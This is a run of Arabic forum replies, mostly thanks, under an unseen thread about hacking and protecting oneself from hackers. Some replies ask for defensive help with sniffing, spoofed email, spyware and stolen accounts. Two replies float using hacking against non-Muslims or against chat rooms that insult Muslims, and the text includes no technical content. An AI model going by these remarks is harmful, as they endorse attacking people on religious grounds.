و ياريت لو سمحت تشرح قليلا sniffing علشان معظم الناس مشتركين فى شبكات علشان الدى اس ال

و احنا طبعا عايزين نحمى نفسنا لو فى اى حد فى الشبكة بيعمل هاكنج..

و شكرا يا باشا على الموضوع الجميل

شكرا علي المعلومات

مشكور أخي الكريم

thanksssssssssssssssssssssssssssssssssssssss

مشكور يا اخى على الموضوع

ليه استفسار بخصوص رسايل على الايميل بتوصلى باسم ايميلى من احدى المنتديات

يعنى بيرسيل ايميل بيكون اسم المرسل هو نفس اسم المرسل اليه

يعنى ممكن يستخدم ايميلى والبيانات بتعتى الى فى المنتدى زى مهو عايز

فان عايز اعرف ازاى امنع حاجه زى دى

بجد الف شكر على المجهود الرائع دة
بس لو الواحد عمل الكلام ده في غير المسلمين
صح ولا غلط

الرد 101

مشكور وجزاك الله خير على هذه المعلومات القيمة

شكرا ليك على الموضوع

thanks man

شكرا جدا يا زعيم على المعلومات الطيبة ده

thxxxxxxxxxxxxxxxxxxxxx

thxxxxxxxxxxx

لو سمحت ممكن تساعدنى انا جيبت برنامج هاكهر اللى هو بيراقب الجهاز وهو طبعا بينزل مخفى انا عايز اجيب البرنامج من على الجهاز وانا عامله بباسورد وكل حاجه بس اجيبه ازاااااااااااااااى

thankzzzzzzzzzzzzzzzzzzzzzzzzzzz

بارك الله لك في عقلك .
شكراً لك جهدك .

شكرا يا مان على المعلومات الجامده جدا

شكرا علي الموضوع

thanks for the VI topic

شكرا يا برنس و موضوع رائع

شكرا اخي العزيز على النصائح الغاليه
بس خدها نصيحه مني انا
الهكر بيعتمد على 90% ذكاء
5 % برامج
5% غباء الضحيه

مشكووووووور جدا

الراجل دة بيتكلم صح اوى

اسالنى انا

^_^

THANKS MAN
NICE JOP

thanxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

شكرا اخي العزيز على النصائح الغاليه

الف شكر على الموضوع الرائع

شكرا اخى الحبيب

thanksssssssssssssssssssssssssssssssssssssssssssss ssssssssssssssssssssssssssssssssssss

alf shokr ya raies 3al mawdoo3 el mohem

شكررررررررررررررررررررررررررررا اوي علي النصايح دي

شكرا يا اخي عمل عظيم

الف شكر
وجزاك الله خيرا

thx man thx

GGGGGGGGGGAAAAAAAAAAAAAAAMMMMMMMMMMMEEEEEEEEEEEEEE EDDDDDDD

مشكور جدا على مجهودك العظيم لحمايتنا من الهاكر و معرفة بعض الثغرات التى قد تؤدى الى اضرار لا محالة لها

thank you very much

شكرا على الموضوع انا هقراه كذا مرة علشان حاسس انو صعب استيعابة بسهولة

لالالالالالالالالالالالالالالالالالالالالالالالالا لالالالالالالالالالالالالالالالالالالالالالالالالا لالالالالالالا
شرح
جامد جدا
ربنا يحميك

مشكور على مجهودك العظيم

بجد مفيش اجمل من كده موضوع
اقوي موضوع و احسن وافيد موضوع شفته لحد دلوقتي
انا بشكرك بشده علي الموضوع ده
وارفع ليك القبعه
واتمني انك تزيده بكل ما هو جديد
شكرا يا باشا
انت نجم فوق العاده

شكرا على المعلومات القيمة

العضو دة موقوف لية

مشكووووووووووووور

مشكووووووووووووور

ياباشا وربنا انتا ملكش حــل الف الف شكــر وتسلم آيدك

ياباشا وربنا انتا ملكش حــل الف الف شكــر وتسلم آيدك

شكرا على الشرح الرائع
:glasses::glasses:

اولا احب اشكرك على الموضوع الجميل بس كنت محتاجك فى مساعدة محتاجها جدا انا الاميل بتاعى اتسرق و فى حاجات محتجها جدا لو ينفع تقولى ازاى ارجعة انا مستنى ردك ضرورى من فضلك و شكرا

ماشاءالله موضوع اكتر من هااااااايل طيب بجد ياريت تسلط الضوء على موضوع الهاكر السلمي على غرف المحادثات اللي بتشتم في المسلمين ولكم جزيل الشكر

الف الف شكر على المجهود الف الف شكر على المجهود

مشكوووووووور

الفشكر على المعلومات الرائعه.

شكرا جداااا اخوي العزيز

اللهم زدهم علما نافعا و اجعلهم ناصرين لدينك و ارحمهم و ارحم ابائهم

كل الشكر لكـ على شرحك الرائع

الف شكر على المعلومات الهامة

شكرا يا اخى على المعلومات القيمة و المفيدة

مشكووووووووور

رائع جدا الموضوع

شكرا على المعلومات المفيدة ونتمنى المزيد

الله يعطيك الف عاااااااااااااااااافيه

مشكووووور بجد

موضوع جاااااامد ومهم جدا


تقبل مرورى

معلومات قيمة
بس مش حنقدر نشكرك لانك موقوف

معلومات جد مهمة لكل هاكر
شكرا لك اخي

شكرااااااااا

الموضوع ده جامد جدا جدا جدا
وأشكرك كثيرا على هذه المعلومات

merciiiiiiiiiiiiiiiiiiiiiiii

merciiiiiiiiiiiiiiiiiiiiiiii

مشكوووووووووووور يا نجم على الموضوع الجبار

ربنا يهدى الناس جميعا

مشكووووووووووووووووووووور علي المعلومات الجميلة


والي الامام


اتمنى لكم مزيد من الابداع والتطور


بارك الله فيك

موضوع رائع
ومجهود عظيم
تسلم الايادي

السلام عليكم شكرأ على هذا الموضوع الرائع ونتمنى المزيد

شكلرا اخي على هذ البرنامج لقد غستفدجت كثيرا

معلومات قيمه جدا ... الف شكر

الف الف شكر على المجهود الرائع الف الف شكر على المجهود الرائع

thank you man

الله ينور بس كنا محتاجين شوية تفاصيل لحماية Ip

شكرا على مجهودك

الف شكر على الشرح العظيم

thankssssssssssssssssss

مشكووووووووور أخي على الموضوع الرائع